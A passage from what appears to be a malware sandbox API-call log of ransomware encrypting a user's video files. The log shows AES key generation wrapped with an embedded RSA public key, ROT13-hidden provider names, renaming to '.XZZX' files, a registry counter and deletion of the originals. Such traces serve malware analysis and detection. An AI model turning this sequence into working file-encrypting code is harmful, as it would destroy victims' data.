pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0132.753] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cf7ea0) returned 1 [0132.754] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7ea0, dwCertEncodingType=0x1, pInfo=0x3d0e588*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e5b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e5c0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d11198) returned 1 [0132.754] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.754] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0132.754] CryptEncrypt (in: hKey=0x3d11198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0132.754] CryptEncrypt (in: hKey=0x3d11198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7f28*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7f28*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0132.754] WriteFile (in: hFile=0x6dc, lpBuffer=0x3cf7f28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7f28*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0132.755] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0132.755] WriteFile (in: hFile=0x6dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.755] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0132.755] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0132.755] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x6e0) returned 0x0 [0132.755] RegQueryValueExW (in: hKey=0x6e0, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xbb, lpcbData=0x420dfdc*=0x4) returned 0x0 [0132.755] RegCloseKey (hKey=0x6e0) returned 0x0 [0132.755] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x6e0) returned 0x0 [0132.755] RegSetValueExW (in: hKey=0x6e0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xbc, cbData=0x4 | out: lpData=0x420dfec*=0xbc) returned 0x0 [0132.755] RegCloseKey (hKey=0x6e0) returned 0x0 [0132.755] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.756] VirtualFree (lpAddress=0x4210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.756] CloseHandle (hObject=0x6dc) returned 1 [0132.757] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0132.758] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0132.758] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\yXpEf4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\yxpef4.mkv")) returned 1 [0132.761] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\yXpEf4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\yxpef4.mkv")) returned 0 Thread: id = 452 os_tid = 0xa60 [0132.759] lstrcpyA (in: lpString1=0x435fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.759] lstrcpyW (in: lpString1=0x435f460, lpString2="8bunT0Nrx1v M.avi" | out: lpString1="8bunT0Nrx1v M.avi") returned="8bunT0Nrx1v M.avi" [0132.759] lstrcpyW (in: lpString1=0x435e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0132.759] SetErrorMode (uMode=0x1) returned 0x1 [0132.759] lstrcpyW (in: lpString1=0x435f860, lpString2="8bunT0Nrx1v M.avi" | out: lpString1="8bunT0Nrx1v M.avi") returned="8bunT0Nrx1v M.avi" [0132.759] CoCreateGuid (in: pguid=0x435e440 | out: pguid=0x435e440*(Data1=0x628fb268, Data2=0x7a41, Data3=0x4355, Data4=([0]=0x93, [1]=0xe6, [2]=0x87, [3]=0x8d, [4]=0xe9, [5]=0xe6, [6]=0xb0, [7]=0xf4))) returned 0x0 [0132.759] wsprintfW (in: param_1=0x435ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8bunT0Nrx1v M.avi") returned 65 [0132.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x435fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0132.759] wsprintfW (in: param_1=0x435e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8181DC6820279A95628FB268245D7EDD.XZZX") returned 85 [0132.759] StrStrW (lpFirst="8bunT0Nrx1v M.avi", lpSrch="XZZX") returned 0x0 [0132.759] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8bunT0Nrx1v M.avi", dwFileAttributes=0x20) returned 1 [0132.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8bunT0Nrx1v M.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\8bunt0nrx1v m.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c4 [0132.762] ReadFile (in: hFile=0x6c4, lpBuffer=0x4367d60, nNumberOfBytesToRead=0x61b8, lpNumberOfBytesRead=0x435e418, lpOverlapped=0x0 | out: lpBuffer=0x4367d60*, lpNumberOfBytesRead=0x435e418*=0x61b8, lpOverlapped=0x0) returned 1 [0132.763] CloseHandle (hObject=0x6c4) returned 1 [0132.763] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0132.764] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0132.764] SetErrorMode (uMode=0x1) returned 0x1 [0132.764] lstrcpyW (in: lpString1=0x435e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0132.764] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf7fb0) returned 1 [0132.767] CryptGenKey (in: hProv=0x3cf7fb0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11218) returned 1 [0133.144] CryptExportKey (in: hKey=0x3d11218, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x435e41c | out: pbData=0x0*, pdwDataLen=0x435e41c*=0x94) returned 1 [0133.144] CryptExportKey (in: hKey=0x3d11218, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x435e41c | out: pbData=0x40a0000*, pdwDataLen=0x435e41c*=0x94) returned 1 [0133.144] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.144] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0133.144] CryptDestroyKey (hKey=0x3d11218) returned 1 [0133.144] CryptReleaseContext (hProv=0x3cf8148, dwFlags=0x0) returned 0 [0133.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8181DC6820279A95628FB268245D7EDD.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\8181dc6820279a95628fb268245d7edd.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0133.145] WriteFile (in: hFile=0x6e4, lpBuffer=0x4367d60*, nNumberOfBytesToWrite=0x61b8, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x4367d60*, lpNumberOfBytesWritten=0x435e438*=0x61b8, lpOverlapped=0x0) returned 1 [0133.146] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x61b8 [0133.146] WriteFile (in: hFile=0x6e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0133.146] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x61bd [0133.146] WriteFile (in: hFile=0x6e4, lpBuffer=0x435f860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x435f860*, lpNumberOfBytesWritten=0x435e438*=0x22, lpOverlapped=0x0) returned 1 [0133.146] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x61df [0133.146] WriteFile (in: hFile=0x6e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0133.146] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x61e4 [0133.146] SetErrorMode (uMode=0x1) returned 0x1 [0133.147] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0133.147] OutputDebugStringW (lpOutputString="end") [0133.147] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ5\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0133.147] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x435dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8 | out: pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8) returned 1 [0133.147] CryptAcquireContextW (in: phProv=0x435d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x435d3e4*=0x3cf81d0) returned 1 [0133.148] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf81d0, dwCertEncodingType=0x1, pInfo=0x3cf1b90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1bc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1bc8*, PublicKey.cUnusedBits=0x0), phKey=0x435d3ec | out: phKey=0x435d3ec*=0x3d11218) returned 1 [0133.148] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.148] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0133.148] CryptEncrypt (in: hKey=0x3d11218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x435d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x435d3f0*=0x80) returned 1 [0133.148] CryptEncrypt (in: hKey=0x3d11218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8258*, pdwDataLen=0x435d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8258*, pdwDataLen=0x435d3e8*=0x80) returned 1 [0133.148] WriteFile (in: hFile=0x6e4, lpBuffer=0x3cf8258*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8258*, lpNumberOfBytesWritten=0x435e438*=0x80, lpOverlapped=0x0) returned 1 [0133.148] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0133.148] WriteFile (in: hFile=0x6e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0133.148] GetUserNameW (in: lpBuffer=0x435e1f8, pcbBuffer=0x435dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x435dfe0) returned 1 [0133.149] wsprintfW (in: param_1=0x435dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0133.149] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe4 | out: phkResult=0x435dfe4*=0x6f0) returned 0x0 [0133.149] RegQueryValueExW (in: hKey=0x6f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x435dfd8, lpData=0x435dfec, lpcbData=0x435dfdc*=0x4 | out: lpType=0x435dfd8*=0x4, lpData=0x435dfec*=0xbd, lpcbData=0x435dfdc*=0x4) returned 0x0 [0133.149] RegCloseKey (hKey=0x6f0) returned 0x0 [0133.149] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe8 | out: phkResult=0x435dfe8*=0x6f0) returned 0x0 [0133.149] RegSetValueExW (in: hKey=0x6f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x435dfec*=0xbe, cbData=0x4 | out: lpData=0x435dfec*=0xbe) returned 0x0 [0133.149] RegCloseKey (hKey=0x6f0) returned 0x0 [0133.149] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.150] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.150] CloseHandle (hObject=0x6e4) returned 1 [0133.151] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0133.151] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0133.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8bunT0Nrx1v M.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\8bunt0nrx1v m.avi")) returned 1 [0133.152] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8bunT0Nrx1v M.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\8bunt0nrx1v m.avi")) returned 0 Thread: id = 453 os_tid = 0xa64 [0132.902] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.902] lstrcpyW (in: lpString1=0x420f460, lpString2="aC_Ja4AvvNCLsQMnj7.swf" | out: lpString1="aC_Ja4AvvNCLsQMnj7.swf") returned="aC_Ja4AvvNCLsQMnj7.swf" [0132.902] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0132.902] SetErrorMode (uMode=0x1) returned 0x1 [0132.902] lstrcpyW (in: lpString1=0x420f860, lpString2="aC_Ja4AvvNCLsQMnj7.swf" | out: lpString1="aC_Ja4AvvNCLsQMnj7.swf") returned="aC_Ja4AvvNCLsQMnj7.swf" [0132.902] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xcbd33ade, Data2=0xd816, Data3=0x42b3, Data4=([0]=0x87, [1]=0x89, [2]=0xf6, [3]=0x20, [4]=0x78, [5]=0xf6, [6]=0xeb, [7]=0x6))) returned 0x0 [0132.902] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\aC_Ja4AvvNCLsQMnj7.swf") returned 70 [0132.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0132.902] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned 85 [0132.902] StrStrW (lpFirst="aC_Ja4AvvNCLsQMnj7.swf", lpSrch="XZZX") returned 0x0 [0132.902] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\aC_Ja4AvvNCLsQMnj7.swf", dwFileAttributes=0x20) returned 1 [0132.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\aC_Ja4AvvNCLsQMnj7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\ac_ja4avvnclsqmnj7.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e0 [0132.903] ReadFile (in: hFile=0x6e0, lpBuffer=0x4378cf8, nNumberOfBytesToRead=0x1750c, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesRead=0x420e418*=0x1750c, lpOverlapped=0x0) returned 1 [0132.904] CloseHandle (hObject=0x6e0) returned 1 [0132.904] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0132.904] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4210000 [0132.904] SetErrorMode (uMode=0x1) returned 0x1 [0132.904] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0132.904] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf8038) returned 1 [0132.906] CryptGenKey (in: hProv=0x3cf8038, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11298) returned 1 [0133.081] CryptExportKey (in: hKey=0x3d11298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0133.081] CryptExportKey (in: hKey=0x3d11298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4210000, pdwDataLen=0x420e41c | out: pbData=0x4210000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0133.081] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.081] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0133.081] CryptDestroyKey (hKey=0x3d11298) returned 1 [0133.081] CryptReleaseContext (hProv=0x3cf8038, dwFlags=0x0) returned 1 [0133.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\bdd25f14384cc362cbd33ade3c6da7aa.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6ec [0133.082] WriteFile (in: hFile=0x6ec, lpBuffer=0x4378cf8*, nNumberOfBytesToWrite=0x1750c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesWritten=0x420e438*=0x1750c, lpOverlapped=0x0) returned 1 [0133.084] SetFilePointer (in: hFile=0x6ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1750c [0133.084] WriteFile (in: hFile=0x6ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0133.084] SetFilePointer (in: hFile=0x6ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17511 [0133.084] WriteFile (in: hFile=0x6ec, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2c, lpOverlapped=0x0) returned 1 [0133.084] SetFilePointer (in: hFile=0x6ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1753d [0133.084] WriteFile (in: hFile=0x6ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0133.084] SetFilePointer (in: hFile=0x6ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17542 [0133.085] SetErrorMode (uMode=0x1) returned 0x1 [0133.085] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0133.085] OutputDebugStringW (lpOutputString="end") [0133.085] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 